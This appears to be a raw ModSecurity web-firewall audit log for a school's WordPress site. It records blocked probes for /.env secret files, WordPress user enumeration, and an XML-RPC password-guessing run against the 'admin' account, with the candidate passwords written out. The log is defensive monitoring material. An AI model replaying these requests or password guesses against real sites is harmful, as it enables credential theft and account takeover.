Stopwatch: 1749851741412390 3038 (- - -) Stopwatch2: 1749851741412390 3038; combined=1278, p1=415, p2=833, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c36b966a-Z-- --52f4645d-A-- [14/Jun/2025:05:00:18 +0700] aEyfcmIDXuKmWNi2UBSweQAAAFg 103.236.140.4 48530 103.236.140.4 8181 --52f4645d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.165.196.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.165.196.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --52f4645d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52f4645d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749852018380113 3650 (- - -) Stopwatch2: 1749852018380113 3650; combined=1522, p1=500, p2=984, p3=0, p4=0, p5=37, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --52f4645d-Z-- --25f7bc2d-A-- [14/Jun/2025:05:02:31 +0700] aEyf92mwZ6YUkjOdtI6-VAAAAAM 103.236.140.4 48534 103.236.140.4 8181 --25f7bc2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.216 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --25f7bc2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25f7bc2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749852151602465 834 (- - -) Stopwatch2: 1749852151602465 834; combined=341, p1=298, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25f7bc2d-Z-- --c87c6470-A-- [14/Jun/2025:05:38:54 +0700] aEyofl3g_boun6Rx5jLL0QAAAMA 103.236.140.4 48696 103.236.140.4 8181 --c87c6470-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.139 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.139 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --c87c6470-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c87c6470-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749854334512606 933 (- - -) Stopwatch2: 1749854334512606 933; combined=342, p1=300, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c87c6470-Z-- --9adbe45f-A-- [14/Jun/2025:05:51:33 +0700] aEyrdWmwZ6YUkjOdtI6-eAAAAAw 103.236.140.4 48768 103.236.140.4 8181 --9adbe45f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.12pre) Gecko/20080122 Firefox/2.0.0.12pre --9adbe45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9adbe45f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749855093926593 878 (- - -) Stopwatch2: 1749855093926593 878; combined=349, p1=307, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9adbe45f-Z-- --e9173d2b-A-- [14/Jun/2025:05:51:34 +0700] aEyrdmmwZ6YUkjOdtI6-eQAAAA4 103.236.140.4 48770 103.236.140.4 8181 --e9173d2b-B-- GET /.env.crt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG-SM-N910A Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36 --e9173d2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9173d2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749855094837362 764 (- - -) Stopwatch2: 1749855094837362 764; combined=293, p1=263, p2=0, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9173d2b-Z-- --338c8b2e-A-- [14/Jun/2025:06:35:55 +0700] aEy122mwZ6YUkjOdtI6-sQAAABg 103.236.140.4 49022 103.236.140.4 8181 --338c8b2e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.193 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.193 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept-Charset: utf-8 --338c8b2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --338c8b2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749857755564043 900 (- - -) Stopwatch2: 1749857755564043 900; combined=406, p1=363, p2=0, p3=0, p4=0, p5=43, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --338c8b2e-Z-- --ce60ac1b-A-- [14/Jun/2025:07:53:37 +0700] aEzIEV3g_boun6Rx5jLNpwAAANc 103.236.140.4 56050 103.236.140.4 8181 --ce60ac1b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ce60ac1b-C-- wp.getUsersBlogs admin 12345678 --ce60ac1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce60ac1b-E-- --ce60ac1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862417339769 4754 (- - -) Stopwatch2: 1749862417339769 4754; combined=3470, p1=420, p2=2828, p3=0, p4=0, p5=124, sr=125, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce60ac1b-Z-- --92486649-A-- [14/Jun/2025:07:54:51 +0700] aEzIW0MWfhkd5Y0sFtrnpAAAAJY 103.236.140.4 56188 103.236.140.4 8181 --92486649-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --92486649-C-- wp.getUsersBlogs admin admin2008 --92486649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92486649-E-- --92486649-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862491268553 5188 (- - -) Stopwatch2: 1749862491268553 5188; combined=3687, p1=450, p2=3054, p3=0, p4=0, p5=106, sr=90, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92486649-Z-- --5d7be66c-A-- [14/Jun/2025:07:55:51 +0700] aEzIl2mwZ6YUkjOdtI7AkgAAABU 103.236.140.4 56274 103.236.140.4 8181 --5d7be66c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d7be66c-C-- wp.getUsersBlogs admin admin2005 --5d7be66c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d7be66c-E-- --5d7be66c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862551005808 5361 (- - -) Stopwatch2: 1749862551005808 5361; combined=3788, p1=453, p2=3142, p3=0, p4=0, p5=111, sr=93, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d7be66c-Z-- --69e9f16a-A-- [14/Jun/2025:07:56:05 +0700] aEzIpWmwZ6YUkjOdtI7AlAAAABA 103.236.140.4 56278 103.236.140.4 8181 --69e9f16a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.83.240.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.83.240.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69e9f16a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69e9f16a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749862565807452 3169 (- - -) Stopwatch2: 1749862565807452 3169; combined=1391, p1=471, p2=884, p3=0, p4=0, p5=36, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e9f16a-Z-- --c2f51f74-A-- [14/Jun/2025:07:56:51 +0700] aEzI02IDXuKmWNi2UBSykQAAAEw 103.236.140.4 56336 103.236.140.4 8181 --c2f51f74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c2f51f74-C-- wp.getUsersBlogs admin Marketing2018_ --c2f51f74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2f51f74-E-- --c2f51f74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862611231891 4782 (- - -) Stopwatch2: 1749862611231891 4782; combined=3582, p1=429, p2=2904, p3=0, p4=0, p5=167, sr=125, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2f51f74-Z-- --22c2e671-A-- [14/Jun/2025:07:57:39 +0700] aEzJA2mwZ6YUkjOdtI7AnwAAAAs 103.236.140.4 56362 103.236.140.4 8181 --22c2e671-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --22c2e671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --22c2e671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749862659943634 849 (- - -) Stopwatch2: 1749862659943634 849; combined=346, p1=304, p2=0, p3=0, p4=0, p5=42, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22c2e671-Z-- --3ae1f645-A-- [14/Jun/2025:07:57:56 +0700] aEzJFF3g_boun6Rx5jLNwgAAAMM 103.236.140.4 56366 103.236.140.4 8181 --3ae1f645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3ae1f645-C-- wp.getUsersBlogs admin admin@1984 --3ae1f645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae1f645-E-- --3ae1f645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862676700523 5418 (- - -) Stopwatch2: 1749862676700523 5418; combined=3856, p1=457, p2=3191, p3=0, p4=0, p5=119, sr=86, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae1f645-Z-- --cb26121e-A-- [14/Jun/2025:07:59:03 +0700] aEzJV13g_boun6Rx5jLNxgAAAMg 103.236.140.4 56418 103.236.140.4 8181 --cb26121e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cb26121e-C-- wp.getUsersBlogs admin marketing2017_ --cb26121e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb26121e-E-- --cb26121e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862743442059 5519 (- - -) Stopwatch2: 1749862743442059 5519; combined=3908, p1=502, p2=3176, p3=0, p4=0, p5=130, sr=90, sw=100, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb26121e-Z-- --18b0c655-A-- [14/Jun/2025:08:00:03 +0700] aEzJk2mwZ6YUkjOdtI7ArAAAABc 103.236.140.4 56580 103.236.140.4 8181 --18b0c655-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 234 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --18b0c655-C-- wp.getUsersBlogs admin smkn22-jkt.sch.id123456 --18b0c655-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18b0c655-E-- --18b0c655-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862803522813 5150 (- - -) Stopwatch2: 1749862803522813 5150; combined=3629, p1=466, p2=2984, p3=0, p4=0, p5=104, sr=83, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18b0c655-Z-- --eab4d00e-A-- [14/Jun/2025:08:01:21 +0700] aEzJ4V3g_boun6Rx5jLOEwAAAM0 103.236.140.4 56650 103.236.140.4 8181 --eab4d00e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --eab4d00e-C-- wp.getUsersBlogs admin temp --eab4d00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab4d00e-E-- --eab4d00e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862881419139 5447 (- - -) Stopwatch2: 1749862881419139 5447; combined=3872, p1=500, p2=3148, p3=0, p4=0, p5=127, sr=97, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab4d00e-Z-- --12cbcd13-A-- [14/Jun/2025:08:02:21 +0700] aEzKHWIDXuKmWNi2UBSyuwAAAEg 103.236.140.4 56730 103.236.140.4 8181 --12cbcd13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12cbcd13-C-- wp.getUsersBlogs admin admin9876 --12cbcd13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12cbcd13-E-- --12cbcd13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749862941231952 4264 (- - -) Stopwatch2: 1749862941231952 4264; combined=3296, p1=369, 